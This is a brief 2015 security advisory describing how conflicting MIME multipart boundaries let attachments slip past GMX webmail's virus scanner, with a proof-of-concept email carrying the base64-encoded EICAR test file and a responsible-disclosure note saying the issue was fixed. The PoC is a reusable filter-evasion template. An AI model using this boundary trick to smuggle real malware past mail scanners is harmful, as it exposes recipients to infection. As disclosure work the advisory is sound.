July 2015

Please note that republishing this article in full or in part is only allowed under the conditions described here.

Bypassing GMX Virus Scanning using Conflicting MIME Boundaries

The virus scanner integrated in GMX mail can be bypassed by using conflicting MIME boundaries. This kind of evasion is in detail described in Dubious MIME - Conflicting Multipart Boundaries.

Proof Of Concept

     From: foo
     To: bar
     Subject: eicar - conflicting boundaries
     Mime-Version: 1.0
     Content-type: multipart/mixed; boundary=foo
     Content-type: multipart/mixed; boundary=bar
     
     --foo
     Content-type: text/plain
     
     --bar
     Content-type: application/octet-stream; name=eicar.com
     Content-Transfer-Encoding: base64
     
     WDVPIVAlQEFQWzRcUFpYNTQoUF4pN0NDKTd9JEVJQ0FSLVNU
     QU5EQVJELUFOVElWSVJVUy1URVNULUZJTEUhJEgrSCo=
     --bar--
     --foo--

GMX Webmail will use the second boundary 'bar' for displaying the mail and for downloads of attachments. This way it provides access to the attached file 'eicar.com' which contains the Eicar test virus.

The virus scanner instead will use the first boundary 'foo' and thus will not see the attacht virus.

Responsible Disclosure

The issue was reported to GMX in 06/2015 (ticket C542162419) and fixed within a few weeks.